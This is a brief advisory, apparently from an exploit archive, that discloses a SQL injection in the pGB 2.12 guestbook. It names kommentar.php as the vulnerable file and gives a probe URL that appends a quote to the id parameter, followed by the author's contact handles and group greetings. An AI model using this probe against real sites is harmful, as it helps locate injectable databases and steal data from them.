pGB version 2.12 suffers from a remote SQL injection vulnerability.
249b134c21e78e3d3b7b6f54045a954016e5e010e436f08262c3feaafc1f2029
# Exploit Title: pGB 2.12 SQL Injection Vulnerability
# Date: 18/01/2012 - 03.52
# Author: 3spi0n
# Software Website: http://www.powie.de/
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable File:
[~] kommentar.php
[$] Demo Sites:
[~] http://server/kommentar.php?id=117'
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Dar bi Koridor Benimki, Kendimi Aradigim.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- Mr.PaPaRoSSe And 3spi0n -
Bug Researcher Group - TURKEY
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>